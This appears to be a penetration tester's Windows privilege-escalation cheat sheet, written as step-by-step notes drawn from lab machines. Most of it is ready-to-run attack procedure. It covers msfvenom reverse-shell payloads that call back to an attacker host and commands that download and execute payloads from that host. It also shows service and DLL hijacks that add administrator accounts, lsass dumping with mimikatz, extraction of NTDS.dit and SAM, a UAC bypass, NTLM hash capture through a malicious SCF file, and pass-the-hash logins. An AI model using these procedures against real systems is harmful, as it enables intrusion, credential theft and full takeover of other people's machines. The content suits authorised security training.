Privilege Escalation

Enumeration

Kernel Exploits

What is a kernel

Windows kernel

Kernel Exploits

Methodology

  1. Enumerate win version / patch level (systeminfo)

  2. Find matching exploits (Google, ExploitDB, GIthub)

  3. Compile and run

ATTENTION: Kernel exploits are often unstable and could crash the system

Famous kernel exploit

  • MS08-067 - vulnerability in the "Server" service

  • MS17-010 - EternalBlue - remote code execution vulnerability

  • CVE-2021-36934 HiveNightmare - SeriousSam - Windows 10 flaw that results in ANY user having rights to read the Windows registry

Enumeration and Exploitation Examples

  • icacls c:\Windows\System32\config\SAM check perm on SAM file

  • Exploit CVE-2021-36934 with this poc you will get hash and then will be able to get a shell for instance with psexec psexec.py INLANEFREIGHT/administrator@10.129.43.13 -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54

  • Check for spooler service using powershell ls \\localhost\pipe\spoolss

  • Add local admon with PrintNightmare with this Powershell PoC

    • Set-ExecutionPolicy Bypass -Scope Process

    • Import-Module .\CVE-2021-1675.ps1

    • Invoke-Nightmare -NewUser "username" -NewPassword "password123!" -DriverName "PrintIt"

    • Check if it worked net user username

  • Check installed updates

    • Powershell systeminfo wmic qfe list brief Get-Hotfix

    • CMD with wmic wmic qfe list brief

  • CVE-2020-0668

    • Check out this blog post

    • Use this exploit

      • Download it

      • Open it with visual studio

      • Build it

    • Check for a third party serv that can be leverage. Check perm on a binary icacls "c:\path\to\leverage-bin.exe"

    • Generate a malicious file msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACK-IP LPORT=PORT -f exe > leverage-bin.exe

    • python3 -m http.server 80 serve the binary

    • Download 2 copy of the binary

      • wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin.exe

      • wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin2.exe

    • Run the exploit C:\CVE-2020-0668\CVE-2020-0668.exe C:\Users\user\Desktop\leverage-bin.exe "c:\path\to\leverage-bin.exe"

    • Check perm of new file icacls 'c:\path\to\leverage-bin.exe'

    • Replace with malicious binary copy /Y C:\Users\user\Desktop\leverage-bin2.exe "c:\path\to\leverage-bin.exe"

    • Use a Metasploit Resource Script

      • Make a file named handler.rc and put this in it

        use exploit/multi/handler
        set PAYLOAD windows/x64/meterpreter/reverse_https
        set LHOST <our_ip>
        set LPORT 8443
        exploit
      • Launch metasploit this the resource script msfconsole -r handler.rc

    • Start the service net start leverage-serv

    • Even if we get an error we should have a reverse shell in meterpreter

Tools

Executables

  • WinPEAS WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.

  • Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

  • Seatbelt C# project for performing a wide variety of local privilege escalation checks

  • SharpUp C# version of PowerUp

PowerShell

Sherlock

Sherlock.ps1 is a powershell script that will give exploit related to the target. It can also be found here on kali if empire is installed /usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1

  • We can launch it with cmd like this (has to be served through an http server from the attacking machine) echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/Sherlock.ps1') | powershell -noprofile -

  • Launch from Powershell

Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\Sherlock.ps1
Find-AllVulns

PowerUp

PowerUp is a powershell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found.

Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\PowerUp.ps1
Invoke-AllChecks

JAWS

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

Other

Exploit Suggesters

Windows Exploit Suggester is a python script that will provide the list of vulnerabilities the OS is vulnerable to using systeminfo Here is a blog post about wes next generation

  • Here is a convenient command in wes to grep specifically for privesc exploit and have an output in color python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"

Metasploit Local Exploit Suggester

Precompiled kernel exploits

SessionGopher

  • SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information.

LaZagne

  • LaZagne is a tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more

Sysinternals Suite

Pre-compiled binaries.

It can be useful to have precompiled binaries just ready to run

Unquoted Service Path Vulnerabilities

What is it

Abuse of the research methodology of executable of windows. We will try to place an excutable in a location windows will be looking.

Preresquisites

  • We will need write permissions in an executable folder

  • Check if the binary path is unquoted, we can check a service using sc qc name-of-service

  • Check if we have writing rights with our user we can use accesschk .\accesschk64.exe /accepteula -uwdq "C:\Program Files\" we will have a list of user groups with read and write privs

  • Use msfvenom to generate an executable file msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=7777 -f exe > executable_name.exe

  • Restart the service sc start service-name

Methodology

  • Enumerate with automatic tools or this command: wmic service get name,displayname,pathname,startmode (it will list the running services)

  • Check if we can write in the folder of the service

Enumeration with powerUp

  • powershell -ep bypass

  • . .\PowerUp.ps1

Exploitation

  • msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

  • We place the executable in the folder of the program we wish to abuse

  • We start the vulnerable service in our example unquotedsvc sc start unquotedsvc

  • we should be added as an administrator we can verify this using net localgroup administrators

Runas

What is it

  • It is the possibility of running a command as another user

Enumerate

  • cmdkey /list

How to exploit

  • Check the writeup for Access on HTB here to have an example of privesc using runas

Autorun

What is it

  • It is when you abuse the fact that a program runs automatically

Enumerate

OR

  • With PowerUp:

    • In a win cmd type powershell -ep bypass

    • Then . .\PowerUp.ps1 to load powerUp

How to exploit

  • In kali

    • msfconsole

    • use multi/handler

    • set payload windows/meterpreter/reverse_tcp

    • set lhost Your-Kali-IP-Address

    • run

    • In another cmd tab msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe (give it the same name as the program that has autorun)

  • Take the program you created with msfvenom in your target (python HTTP server and then the browser in your target)

  • In your target

    • Place the program in the directory where the autorun program is

    • Wait for the administrator to log in

  • You should have a shell in your kali in Metasploit

Service Escalation - Registry

What is it

  • If we have admin rights of a registry key in service we could use this to make an executable run with a service (add a user, get a shell, ...)

Enumeration

How to exploit

  • We will use this C script

  • We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");

  • We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe

  • Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)

  • In a cmd from our target reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

  • Now we just need to start the service sc start regsvc

  • net localgroup administrators we can see that our user is now in the administrators group

Escalation via Executable Files

What is it

  • Abusing an executable that we have permissions on

Enumeration

  • powershell -ep bypass

  • . .\PowerUp.ps1

OR

How to exploit

  • We will use this C script

  • We will modify the whoami command: system("whoami > c:\\windows\\temp\\service.txt"); we will add this instead cmd.exe /k net localgroup administrators user /add so our script now looks like this: system("cmd.exe /k net localgroup administrators user /add");

  • We will compile it x86_64-w64-mingw32-gcc windows_service.c -o x.exe

  • Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)

  • In the target cmd copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

  • sc start filepermsvc

  • Our user should be in the local administrators group

Startup Applications

What is it

  • We will abuse a program that is launched on startup in which we have rights

Enumeration

  • The BUILTIN/Users group has full acces (F) to the Startup directory

How to exploit

  • In our attack machine msfconsole we launch Metasploit

  • use multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost IP-OF-OUR-ATTACK-MACHINE

  • run

  • In another tab msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP-OF-OUR-ATTACK-MACHINE -f exe -o x.exe

  • We serve the executable in our target (python http server -> and browse to it from our target)

  • We put the file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (If you are in the explorer you may have to type ProgramData in the path if it does not appear).

  • We wait for an admin to log in

DLL Hijacking

What is it

  • DLL is a dynamic Library they often run with executables, when an executable runs the system will look for the dll and if the dll does not exist we could replace it with one of our own.

Enumeration

    • This will list the dll not found

    • We will need write access to the folder where the dll are missing

How to exploit

  • We are going to use windows_dll.c

  • Edit the file and modify the system command to add our user to the admin goup which would look like this: system("cmd.exe /k net localgroup administrators user /add");

  • We can now compile it x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

  • We serve it to our target (python http server -> browser of our target)

  • We put it in the path where the system will look for it, in our example it is the temp folder

  • We restart the service sc stop dllsvc & sc start dllsvc

  • Our user should be in the admin group now

Binary path

Enumeration

  • PowerUP we should see the service exploitable under the [*] Checking service permissions

OR

  • We can use accesschk accesschk64.exe -wuvc Everyone *

Exploitation

  • sc config daclsvc binpath= "net localgroup administrators user /add"

  • sc start daclsvc

  • We should be added to the administrators group net localgroup administrators

Escalation via User Privileges

SeDebugPrivilege

Enumeration

  • whoami /priv the SeDebugPrivilege should be listed

Exploitation

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp We will use ProcDump from the SysInternals suite to leverage this privilege and dump the lsass process memory.

  • We can launch mimikatz from our target

    • mimikatz.exe

    • log

    • sekurlsa::minidump lsass.dmp

    • sekurlsa::logonpasswords

    • And now we can take the hashes we need

  • If mimikatz does not work and if we have RDP we can dump lsass from the taskmanager (tab "Details" right click on the lsass process and select "Create dump file"

  • We can then take the dump to our attack machine et use pypykatz

    • pypykatz lsa minidump lsass.DMP

SeTakeOwnershipPrivilege

  • With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS). In this case we need a file to target.

Enumeration

Exploitation

  • If necessary enable the privilege using this script

    • Import-Module .\Enable-Privilege.ps1

  • Take ownership of a flag using takeown `

  • Check the change of ownership worked PS C:\htb> Get-ChildItem -Path 'C:\Path\To\File' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

  • Modify the file ACL with icalcs icacls 'C:\Path\To\File' /grant user:F

  • Use the file you have ownership now! :D

Privesc via Group Privileges

Backup Operators

SeBackupPrivilege

  • This allows us to copy a file from a folder

  • Here is a poc to abuse this

    • We need to import the libs Import-Module .\SeBackupPrivilegeUtils.dll and Import-Module .\SeBackupPrivilegeCmdLets.dll

  • We can now copy protected files and then use them Copy-FileSeBackupPrivilege 'c:\path\to\file\file.txt' .\file.txt

Copying NTDS.dit (for DC)

  • This group will also let us logging in locally to a domain controller.

  • NTDS is the active directory database it contains the ntlm hashes of all users and computers in the domain

  • We can use diskshadow to make a copy of the drive diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
  • Then we just need to copy it with the SeBackupPrivilege Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\paht\to\destination\ntds.dit

Backing up SAM and SYSTEM

  • reg save HKLM\SYSTEM SYSTEM.SAV

  • reg save HKLM\SAM SAM.SAV

Extract the creds

  • We can use secretdumps secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL or the ps module DSInternals

PS C:\user> Import-Module .\DSInternals.psd1
PS C:\user> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\user> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=domain,DC=local' -DBPath .\ntds.dit -BootKey $key
  • Note: We can also use robocopy to copy the files

Event log readers

  • net localgroup "Event Log Readers"

  • wevtutil qe Security /rd:true /f:text | Select-String "/user" search Security logs (credentials could be dropped this way)

  • Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }} Another way to do the same thing

  • It is also worth to check PowerShell Operational logs

DnsAdmins

  • Using this group privileges, it is possible to use dnscmd to specify the path of a DLL plugin.

  • Get-ADGroupMember -Identity DnsAdmins to confirm group membership

  • msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll we generate a dll with msfvenom that will add a user or we can make one that will get us a shell as admin msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o shell.dl

  • Do not forget to launch a listener if you use the reverse shell rlwrap nc -lnvp 4444

  • Serve the dll using python web server python3 -m http.server 80

  • Download the file in the target wget "http://Attacking-machine-IP/adduser.dll" -outfile "adduser.dll" (in powershell)

  • sc stop dns

  • sc start dns

  • net group "Domain Admins" /dom check that we have the priv (or catch the shell)

Hyper-V Administrators

  • We download this tool to enable the privilege. We need to add the few lines at the begining of the script

#include <stdio.h>
#include "tchar.h"
  • We can then compile it using cl.exe from a visual studio cmd cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

  • We then have to download the Capcom.sys driver file

  • We can then add the reference to the drive reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

  • In powershell we check that the Capcom driver is not loaded with DriverView.exe

    • .\DriverView.exe /stext drivers.txt

    • cat drivers.txt | Select-String -pattern Capcom

  • Finally we can launch the exploit using ExploitCapcom.exe it will launch a shell as authority system

Server Operators

  • With this group you will get theSeBackupPrivilege and SeRestorePrivilege

  • sc qc AppReadiness

  • We can check permissions with sysinternals PsService

    • c:\PsService.exe security AppReadiness

  • Modify service binary path sc config AppReadiness binPath= "cmd /c net localgroup Administrators current-user /add"

  • sc start AppReadiness Start the service (will fail)

  • We should be in the Admin group net localgroup Administrators

  • We can now retrieve creds with crackmapexec crackmapexec smb IP-ADDRESS -u current-user -p 'current password'

  • Dump hash and pass secretsdump.py current-user@IP-ADDRESS -just-dc-user administrator

  • We can then get an admin shell using the found hashes psexec.py INLANEFREIGHT/administrator@IP-ADDRESS -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54

Privesc via OS attacks

UAC Bypass

  • Checkout the Pentips on uac bypass here

  • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA confirm UAS is enabled

  • REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin Checking UAC Level

  • If ConsentPromptBehaviorAdmin is 0x5 it means the highest UAC level of Always notify is enabled

  • [environment]::OSVersion.Version check win OS version compare with version history here

  • List of UAC bypass here

  • msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS-OF_ATTACK_MACHINE LPORT=PORT -f dll > srrstr.dll generate a malicious dll

  • python3 -m http.server 80 serve it to the target

  • curl http://IP-ATTACK-MACHINE/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll" get it on the target

  • nc -lvnp CHOSEN-PORT launch listener

  • rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll run the dll to get the reverse shell back and check if uac is enabled for our current user

  • C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe execute this to get an elevated shell

Weak permissions

Permissive ACLs

  • Pentips on abusing ACLs here

  • .\SharpUp.exe audit to enumerate

  • If you detect an executable that you could abuse you can check the permissions with icacls icacls "C:\Path\to\file.exe"

  • Make a back up of the original binary and replace it with a malicious one generated by msfvenom msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=8888 -f exe > file.exe (instead of shell name it with the name of the executable that you are abusing

  • Set up a listener nc -lnvp 8888

  • cmd /c copy /Y file.exe "C:\Path\to\file.exe" copy the exec instead of the original one

  • sc start file start the service

  • Get your shell

  • If you want to exploit it by adding a user msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > file.exe

Weak Service permissions

  • .\SharpUp.exe audit to enumerate

  • Check permissions on the file you might be able to abuse using win internals AccessChk accesschk.exe /accepteula -quvcw service

  • sc config service binpath="cmd /c net localgroup administrators user /add" change the service binary path

  • sc stop service stop the service

  • sc start service start the service (it will fail but our exploit will work)

  • net localgroup administrators check that you user is now admin

  • To clean up

    • sc config WindScribeService binpath="C:\Path\to\service.exe" revert binary path

    • sc start service start the service

    • sc query service check that service is running

Privesc with found credentials

  • You can read more about hunting credentials here and here

Browser Credentials

  • We can use SharpChrome to retrive cookies and saved logins from Google Chrome

  • We can use lazagne to dump passwords from the system .\lazagne.exe all

Other ways to privesc

Interact with users

  • Capture traffic if wireshark is installed

  • Process monitoring

    while($true)
    {
    
      $process = Get-WmiObject Win32_Process | Select-Object CommandLine
      Start-Sleep 1
      $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
      Compare-Object -ReferenceObject $process -DifferenceObject $process2
    
    }
    • IEX (iwr 'http//IP-OF-ATTACK-MACHINE/procmon.ps1') execute the script from our target with the code hosted in our attacking machine

  • Vulnerable service abuse

  • Shell Command File on File Share to capture ntlmv2 pass hash.

    • We need an interesting share writable by our user accesschk -s -w C:\folder-of-shares

    • Create a malicious SCF file and name it with an @ at the start for example @Inventory.scf

    [Shell]
    Command=2
    IconFile=\\ATTACK-IP\share\legit.ico
    [Taskbar]
    Command=ToggleDesktop
    • We then just need to start Responder

      • sudo responder -wrf -v -I INTERFACE-USED (your interface can be tun0 for instance it has to be one reachable by the target)

    • Finally we can crack the found hash with hashcat hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Privesc on Legacy OS

Windows Server 2008

  • wmic qfe will show missing KBs

  • We can use Sherlock to find the vulnerabilities the target might have.

    • On powershell Set-ExecutionPolicy bypass -Scope process

    • Import-Module .\Sherlock.ps1

    • Find-AllVulns

  • Get a meterpreter shell

    • msfconsole

    • search smb_delivery you should see this one 0 exploit/windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery

    • use 0

    • show options set srvhost and lhost to your attack machine

    • set the target to DLL (show targets set target 0

    • exploit

    • Paste the comand shown on msf in the target

    • Receive the shell

  • Find a local privesc exploit

  • For example we can use CVE 2010-3338

  • on metasploit search 2010-3338 you should see 0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation

  • Migrate the process

  • Backgound the session background

  • set session 1

  • set lhost to your attacking machine IP

  • set lport to a free prot

  • exploit

  • You should get an elevated shell

Windows Desktop 7

  • Gather systeminfo and use windows exploit suggester

    • python2.7 windows-exploit-suggester.py --update this will dl a database file in xls format that you can use

    • python2.7 windows-exploit-suggester.py --database 2022-04-30-mssb.xls --systeminfo systeminfo

  • Example of MS16-032 with this poc

    • In Powershell Set-ExecutionPolicy bypass -scope process

    • Import-Module .\exploit.ps1

    • Invoke-MS16-032

    • We will get an elevated shell

Checklists

Resources

Last updated